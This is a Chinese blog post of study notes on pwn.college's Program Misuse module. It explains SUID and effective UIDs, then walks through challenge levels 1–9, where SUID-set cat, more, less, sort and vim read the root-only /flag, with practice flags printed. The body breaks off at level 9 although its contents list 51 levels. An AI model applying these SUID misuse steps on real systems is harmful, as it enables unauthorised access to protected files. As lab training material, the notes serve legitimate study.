<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/wiki/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/wiki/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/wiki/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/wiki/images/logo.svg" color="#222">

<link rel="stylesheet" href="/wiki/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Roboto:300,300italic,400,400italic,700,700italic|sans-serif:300,300italic,400,400italic,700,700italic|'Noto+Sans+SC':300,300italic,400,400italic,700,700italic|Fira+Code:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.14.0/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/pace-js@1.0.2/themes/blue/pace-theme-minimal.css">
  <script src="//cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"w3b5h3ll.github.io","root":"/wiki/","scheme":"Muse","version":"8.0.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"buttons","active":"valine","storage":true,"lazyload":false,"nav":null,"activeClass":"valine"},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}};
  </script>

  <meta name="description" content="Linux Command Line一些资源  https:&#x2F;&#x2F;overthewire.org&#x2F;wargames&#x2F;bandit&#x2F; man or help Ask for help on discord.  文件类型 -  is a regular filed is a directory (yes, directories are actually just special files!)l is">
<meta property="og:type" content="article">
<meta property="og:title" content="尘埃落定的WIKI">
<meta property="og:url" content="https://w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-ProgramMisuse/index.html">
<meta property="og:site_name" content="尘埃落定的WIKI">
<meta property="og:description" content="Linux Command Line一些资源  https:&#x2F;&#x2F;overthewire.org&#x2F;wargames&#x2F;bandit&#x2F; man or help Ask for help on discord.  文件类型 -  is a regular filed is a directory (yes, directories are actually just special files!)l is">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://w3b5h3ll.github.io/w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-ProgramMisuse/2023-12-22-14-47-13-image.png">
<meta property="og:image" content="https://w3b5h3ll.github.io/w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-ProgramMisuse/image-20240509142058672.png">
<meta property="og:image" content="https://w3b5h3ll.github.io/w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-ProgramMisuse/2023-12-22-15-42-07-image.png">
<meta property="og:image" content="https://w3b5h3ll.github.io/w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-ProgramMisuse/2023-12-22-15-40-33-image.png">
<meta property="article:published_time" content="2024-05-09T15:52:51.979Z">
<meta property="article:modified_time" content="2024-05-09T12:28:39.073Z">
<meta property="article:author" content="w3b5h3ll">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://w3b5h3ll.github.io/w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-ProgramMisuse/2023-12-22-14-47-13-image.png">


<link rel="canonical" href="https://w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-ProgramMisuse/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title> | 尘埃落定的WIKI</title>
  






  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/wiki/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">尘埃落定的WIKI</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">嘩啦啦啦啦 天在下雨 嘩啦啦啦啦 雲在哭泣 ......</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/wiki/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/wiki/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <section class="post-toc-wrap sidebar-panel">
          <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Linux-Command-Line"><span class="nav-number">1.</span> <span class="nav-text">Linux Command Line</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Privilege-Escalation"><span class="nav-number">2.</span> <span class="nav-text">Privilege Escalation</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87-Typical-flow"><span class="nav-number">2.1.</span> <span class="nav-text">权限提升 Typical flow:</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#setuid%E5%87%BD%E6%95%B0"><span class="nav-number">2.2.</span> <span class="nav-text">setuid函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Mitigations"><span class="nav-number">2.3.</span> <span class="nav-text">Mitigations</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Challenges"><span class="nav-number">3.</span> <span class="nav-text">Challenges</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#level1"><span class="nav-number">3.1.</span> <span class="nav-text">level1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level2"><span class="nav-number">3.2.</span> <span class="nav-text">level2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level3"><span class="nav-number">3.3.</span> <span class="nav-text">level3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level4"><span class="nav-number">3.4.</span> <span class="nav-text">level4</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level5"><span class="nav-number">3.5.</span> <span class="nav-text">level5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level6"><span class="nav-number">3.6.</span> <span class="nav-text">level6</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level7"><span class="nav-number">3.7.</span> <span class="nav-text">level7</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level8"><span class="nav-number">3.8.</span> <span class="nav-text">level8</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level9"><span class="nav-number">3.9.</span> <span class="nav-text">level9</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level10"><span class="nav-number">3.10.</span> <span class="nav-text">level10</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level11"><span class="nav-number">3.11.</span> <span class="nav-text">level11</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level12"><span class="nav-number">3.12.</span> <span class="nav-text">level12</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level13"><span class="nav-number">3.13.</span> <span class="nav-text">level13</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level14"><span class="nav-number">3.14.</span> <span class="nav-text">level14</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level15"><span class="nav-number">3.15.</span> <span class="nav-text">level15</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level16"><span class="nav-number">3.16.</span> <span class="nav-text">level16</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level17"><span class="nav-number">3.17.</span> <span class="nav-text">level17</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level18"><span class="nav-number">3.18.</span> <span class="nav-text">level18</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level19"><span class="nav-number">3.19.</span> <span class="nav-text">level19</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level20"><span class="nav-number">3.20.</span> <span class="nav-text">level20</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level21"><span class="nav-number">3.21.</span> <span class="nav-text">level21</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level22"><span class="nav-number">3.22.</span> <span class="nav-text">level22</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level23"><span class="nav-number">3.23.</span> <span class="nav-text">level23</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level24"><span class="nav-number">3.24.</span> <span class="nav-text">level24</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level25"><span class="nav-number">3.25.</span> <span class="nav-text">level25</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level26"><span class="nav-number">3.26.</span> <span class="nav-text">level26</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level27"><span class="nav-number">3.27.</span> <span class="nav-text">level27</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level28"><span class="nav-number">3.28.</span> <span class="nav-text">level28</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level29"><span class="nav-number">3.29.</span> <span class="nav-text">level29</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level30"><span class="nav-number">3.30.</span> <span class="nav-text">level30</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level31"><span class="nav-number">3.31.</span> <span class="nav-text">level31</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level32"><span class="nav-number">3.32.</span> <span class="nav-text">level32</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level33"><span class="nav-number">3.33.</span> <span class="nav-text">level33</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level34"><span class="nav-number">3.34.</span> <span class="nav-text">level34</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level35"><span class="nav-number">3.35.</span> <span class="nav-text">level35</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level36"><span class="nav-number">3.36.</span> <span class="nav-text">level36</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level37"><span class="nav-number">3.37.</span> <span class="nav-text">level37</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level38"><span class="nav-number">3.38.</span> <span class="nav-text">level38</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level39"><span class="nav-number">3.39.</span> <span class="nav-text">level39</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level40"><span class="nav-number">3.40.</span> <span class="nav-text">level40</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level41"><span class="nav-number">3.41.</span> <span class="nav-text">level41</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level42"><span class="nav-number">3.42.</span> <span class="nav-text">level42</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level43"><span class="nav-number">3.43.</span> <span class="nav-text">level43</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level44"><span class="nav-number">3.44.</span> <span class="nav-text">level44</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level45"><span class="nav-number">3.45.</span> <span class="nav-text">level45</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level46"><span class="nav-number">3.46.</span> <span class="nav-text">level46</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level47"><span class="nav-number">3.47.</span> <span class="nav-text">level47</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level48"><span class="nav-number">3.48.</span> <span class="nav-text">level48</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level49"><span class="nav-number">3.49.</span> <span class="nav-text">level49</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level50"><span class="nav-number">3.50.</span> <span class="nav-text">level50</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level51"><span class="nav-number">3.51.</span> <span class="nav-text">level51</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-number">4.</span> <span class="nav-text">参考</span></a></li></ol></div>
      </section>
      <!--/noindex-->

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">w3b5h3ll</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/wiki/archives">
          <span class="site-state-item-count">8</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/wiki/tags/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </section>
        <div class="back-to-top animated">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">
      

      

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-ProgramMisuse/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/wiki/images/avatar.gif">
      <meta itemprop="name" content="w3b5h3ll">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="尘埃落定的WIKI">
    </span>

    
    
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2024-05-09 23:52:51 / 修改时间：20:28:39" itemprop="dateCreated datePublished" datetime="2024-05-09T23:52:51+08:00">2024-05-09</time>
    </span>

  
    <span id="/wiki/2024/05/09/PwnCollege-ProgramMisuse/" class="post-meta-item leancloud_visitors" data-flag-title="" title="阅读次数">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span class="leancloud-visitors-count"></span>
    </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/wiki/2024/05/09/PwnCollege-ProgramMisuse/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/wiki/2024/05/09/PwnCollege-ProgramMisuse/" itemprop="commentCount"></span>
    </a>
  </span>
  
  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="Linux-Command-Line"><a href="#Linux-Command-Line" class="headerlink" title="Linux Command Line"></a>Linux Command Line</h2><p>一些资源</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://overthewire.org/wargames/bandit/">https://overthewire.org/wargames/bandit/</a></li>
<li><code>man</code> or <code>help</code></li>
<li>Ask for help on discord.</li>
</ul>
<p>文件类型</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">-  is a regular file</span><br><span class="line">d is a directory (<span class="built_in">yes</span>, directories are actually just special files!)</span><br><span class="line">l is a symbolic <span class="built_in">link</span> (a file that transparently points to another file or directory)</span><br><span class="line">p is a named pipe (also known as a FIFO. You will get very familiar with these this module!)</span><br><span class="line">c is a character device file (i.e., backed by a hardware device that produces or receives data streams, such as a microphone)</span><br><span class="line">b is a block device file (i.e., backed by a hardware device that stores and loads blocks of data, such as a hard drive)</span><br><span class="line">s is a unix socket (essentially a <span class="built_in">local</span> network connection encapsulated <span class="keyword">in</span> a file)</span><br></pre></td></tr></table></figure>

<p>重定向</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">&lt;in_file:      redirect in_file into the <span class="built_in">command</span><span class="string">&#x27;s input</span></span><br><span class="line"><span class="string">&gt;out_file:     redirect the command&#x27;</span>s output into out_file, overwriting it</span><br><span class="line">&gt;&gt;out_file:    redirect the <span class="built_in">command</span><span class="string">&#x27;s output into out_file, appending to it</span></span><br><span class="line"><span class="string">2&gt;error_file:  redirect the command&#x27;</span>s errors into error_file, overwriting it</span><br><span class="line">2&gt;&gt;error_file: redirect the <span class="built_in">command</span><span class="string">&#x27;s errors into error_file, appending to it</span></span><br></pre></td></tr></table></figure>

<h2 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h2><p>Linux permission model Linx权限模型</p>
<p>Process</p>
<ul>
<li><p>UID</p>
</li>
<li><p>GID</p>
</li>
</ul>
<p>File</p>
<ul>
<li><p>user</p>
</li>
<li><p>group</p>
</li>
</ul>
<p><img src="/w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-ProgramMisuse/2023-12-22-14-47-13-image.png"></p>
<p>权限提升的关键：SUID</p>
<p><strong>SUID</strong>: execute with the <code>eUID</code> of the file owner rather than the parent process.</p>
<p><strong>SGID</strong>: execute with the <code>eGID</code> of the file owner rather than the parent process.</p>
<p><strong><code>Sticky</code></strong>: used for shared directories to limit file removal to file owners.用于共享目录，只有文件所有者可以删除该文件</p>
<p>eUID 是什么?</p>
<ul>
<li><p><strong>Effective(eUID, eGID)</strong>: used for <code>most access checks</code>.</p>
</li>
<li><p>Real(UID, GID): the “real” UID of the process owner, used for things such as <code>signal checks</code></p>
</li>
<li><p>Saved: a UID&#x2F;GID that your process could switch its eUID&#x2F;eGID to. Used for <code>temporarily dropping privileges</code></p>
</li>
</ul>
<p>通常情况下<code>eUID</code>与<code>rUID</code>相同，SUID情况下，使用<mark><strong>文件的权限</strong></mark>，而不是进程权限</p>
<p><code>eUID0</code>过于强大</p>
<ul>
<li>打开文件</li>
<li>执行程序</li>
<li>设定任意的<code>UID/GID</code></li>
<li>调式任意程序</li>
</ul>
<h3 id="权限提升-Typical-flow"><a href="#权限提升-Typical-flow" class="headerlink" title="权限提升 Typical flow:"></a>权限提升 Typical flow:</h3><ol>
<li><p>Gain a foothold on the system</p>
</li>
<li><p>Identify a vulnerable privileged service</p>
</li>
<li><p>Exploit the privileged service to gain its privileges.</p>
</li>
</ol>
<p>Child processes inherit from parent processes.</p>
<p>From UID 1000 to UID 0?</p>
<h3 id="setuid函数"><a href="#setuid函数" class="headerlink" title="setuid函数"></a>setuid函数</h3><ul>
<li><p><code>setuid</code>：与最初的假设相反，<code>setuid</code>主要修改<code>euid</code>而不是<code>ruid</code>。特别是对于特权进程，它将<code>ruid</code>、<code>euid</code>和<code>suid</code>与指定用户（通常是root）对齐，有效地由于覆盖<code>suid</code>而巩固这些ID。详细见<a target="_blank" rel="noopener" href="https://man7.org/linux/man-pages/man2/setuid.2.html">setuid man页面</a>。</p>
</li>
<li><p><code>setreuid</code><strong>和</strong><code>setresuid</code>：这些函数允许对<code>ruid</code>、<code>euid</code>和<code>suid</code>进行微妙的调整。但是，它们的功能取决于进程的特权级别。对于非root进程，修改受限于<code>ruid</code>、<code>euid</code>和<code>suid</code>的当前值。相反，具有<code>CAP_SETUID</code>能力的root进程或这些进程可以将这些ID分配任意值。更多信息请参阅<a target="_blank" rel="noopener" href="https://man7.org/linux/man-pages/man2/setresuid.2.html">setresuid man页面</a>和<a target="_blank" rel="noopener" href="https://man7.org/linux/man-pages/man2/setreuid.2.html">setreuid man页面</a>。</p>
</li>
</ul>
<p>增加<code>s</code>位</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="built_in">chmod</span> u+s ./filename</span><br><span class="line"><span class="built_in">chmod</span> g+s ./filename</span><br></pre></td></tr></table></figure>

<p>修改文件<code>owner</code></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">sudo <span class="built_in">chown</span> root:root ./test_uid</span><br></pre></td></tr></table></figure>

<p>实验</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># w3b5h3ll @ DESKTOP-AJON9QQ in ~/pwn.college/program_misuse [10:48:37] </span></span><br><span class="line">$ <span class="built_in">ls</span> -l ./test_uid</span><br><span class="line">-rwsr-xr-x 1 root root 16096 May  9 10:48 ./test_uid</span><br><span class="line"></span><br><span class="line"><span class="comment"># w3b5h3ll @ DESKTOP-AJON9QQ in ~/pwn.college/program_misuse [10:48:43] </span></span><br><span class="line">$ ./test_uid </span><br><span class="line">UID/rUID: 1000</span><br><span class="line">UID/eUID: 0</span><br><span class="line">GID: 1000</span><br></pre></td></tr></table></figure>

<h3 id="Mitigations"><a href="#Mitigations" class="headerlink" title="Mitigations"></a>Mitigations</h3><p>Example: <strong>&#x2F;bin&#x2F;sh</strong> SUID mitigation</p>
<p>Mitigation:</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> /bin/sh is run as SUID(eUID == 0 &amp;&amp; rUID != 0):</span><br><span class="line">    eUID = rUID</span><br><span class="line">    rUID != 0</span><br></pre></td></tr></table></figure>

<p>如上是一个默认配置，关闭该安全选项</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">-p priv          Do not attempt to reset effective uid <span class="keyword">if</span> it does not match uid. This is not <span class="built_in">set</span> by default to <span class="built_in">help</span> avoid incorrect usage by setuid root programs via system(3) or</span><br><span class="line">                 popen(3).</span><br></pre></td></tr></table></figure>

<p>General Mitigations</p>
<ul>
<li>Sandboxing</li>
</ul>
<h2 id="Challenges"><a href="#Challenges" class="headerlink" title="Challenges"></a>Challenges</h2><h3 id="level1"><a href="#level1" class="headerlink" title="level1"></a>level1</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@practice~program-misuse-level-1:/challenge$ ./babysuid_level1 </span><br><span class="line">Welcome to ./babysuid_level1!</span><br><span class="line"></span><br><span class="line">This challenge is part of a series of programs that</span><br><span class="line">exposes you to very simple programs that <span class="built_in">let</span> you directly <span class="built_in">read</span> the flag.</span><br><span class="line"></span><br><span class="line">I just <span class="built_in">set</span> the SUID bit on /usr/bin/cat.</span><br><span class="line">Try to use it to <span class="built_in">read</span> the flag!</span><br><span class="line"></span><br><span class="line">IMPORTANT: make sure to run me (./babysuid_level1) every time that you restart</span><br><span class="line">this challenge container to make sure that I <span class="built_in">set</span> the SUID bit on /usr/bin/cat!</span><br></pre></td></tr></table></figure>

<p><code>cat</code>文件存在SUID</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@practice~program-misuse-level-1:~$ <span class="built_in">cat</span> /flag </span><br><span class="line">pwn.college&#123;practice&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level2"><a href="#level2" class="headerlink" title="level2"></a>level2</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@practice~program-misuse-level-2:/challenge$ ./babysuid_level2 </span><br><span class="line">Welcome to ./babysuid_level2!</span><br><span class="line"></span><br><span class="line">This challenge is part of a series of programs that</span><br><span class="line">exposes you to very simple programs that <span class="built_in">let</span> you directly <span class="built_in">read</span> the flag.</span><br><span class="line"></span><br><span class="line">I just <span class="built_in">set</span> the SUID bit on /usr/bin/more.</span><br><span class="line">Try to use it to <span class="built_in">read</span> the flag!</span><br><span class="line"></span><br><span class="line">IMPORTANT: make sure to run me (./babysuid_level2) every time that you restart</span><br><span class="line">this challenge container to make sure that I <span class="built_in">set</span> the SUID bit on /usr/bin/more!</span><br></pre></td></tr></table></figure>

<p><code>more</code>存在SUID</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@practice~program-misuse-level-2:/challenge$ more /flag</span><br><span class="line">pwn.college&#123;practice&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level3"><a href="#level3" class="headerlink" title="level3"></a>level3</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">Welcome to ./babysuid_level3!</span><br><span class="line"></span><br><span class="line">This challenge is part of a series of programs that</span><br><span class="line">exposes you to very simple programs that <span class="built_in">let</span> you directly <span class="built_in">read</span> the flag.</span><br><span class="line"></span><br><span class="line">I just <span class="built_in">set</span> the SUID bit on /usr/bin/less.</span><br><span class="line">Try to use it to <span class="built_in">read</span> the flag!</span><br><span class="line"></span><br><span class="line">IMPORTANT: make sure to run me (./babysuid_level3) every time that you restart</span><br><span class="line">this challenge container to make sure that I <span class="built_in">set</span> the SUID bit on /usr/bin/less!</span><br></pre></td></tr></table></figure>

<p><code>less</code>存在SUID</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">pwn.college&#123;wTStnM2iEKi3Yjrxlbt8JtAAGc1.QX1QTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level4"><a href="#level4" class="headerlink" title="level4"></a>level4</h3><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">Welcome to ./babysuid_level4!</span><br><span class="line"></span><br><span class="line">This challenge is part of a series of programs that</span><br><span class="line">exposes you to very simple programs that <span class="built_in">let</span> you directly <span class="built_in">read</span> the flag.</span><br><span class="line"></span><br><span class="line">I just <span class="built_in">set</span> the SUID bit on /usr/bin/tail.</span><br><span class="line">Try to use it to <span class="built_in">read</span> the flag!</span><br><span class="line"></span><br><span class="line">IMPORTANT: make sure to run me (./babysuid_level4) every time that you restart</span><br><span class="line">this challenge container to make sure that I <span class="built_in">set</span> the SUID bit on /usr/bin/tail!</span><br></pre></td></tr></table></figure>

<p><code>tail</code>存在SUID</p>
<h3 id="level5"><a href="#level5" class="headerlink" title="level5"></a>level5</h3><p><code>head</code>存在SUID</p>
<h3 id="level6"><a href="#level6" class="headerlink" title="level6"></a>level6</h3><p><code>sort</code>存在SUID</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># -m merge, not sort</span></span><br><span class="line">hacker@program-misuse-level-6:/challenge$ <span class="built_in">sort</span> -m /flag</span><br><span class="line">pwn.college&#123;QZVI_nEcSsVZMgs75pSex5as0Tm.QX4QTMsMjM0YzW&#125;</span><br></pre></td></tr></table></figure>

<h3 id="level7"><a href="#level7" class="headerlink" title="level7"></a>level7</h3><p><code>vim</code>存在SUID</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">hacker@program-misuse-level-7:/challenge$ <span class="built_in">ls</span> -l /flag</span><br><span class="line">-r-------- 1 root root 56 Dec 21 08:18 /flag</span><br><span class="line">hacker@program-misuse-level-7:/challenge$ vim /flag</span><br></pre></td></tr></table></figure>

<h3 id="level8"><a href="#level8" class="headerlink" title="level8"></a>level8</h3><p><code>emacs</code>SUID</p>
<h3 id="level9"><a href="#level9" class="headerlink" title="level9"></a>level9</h3><p><code>nano</code></p>
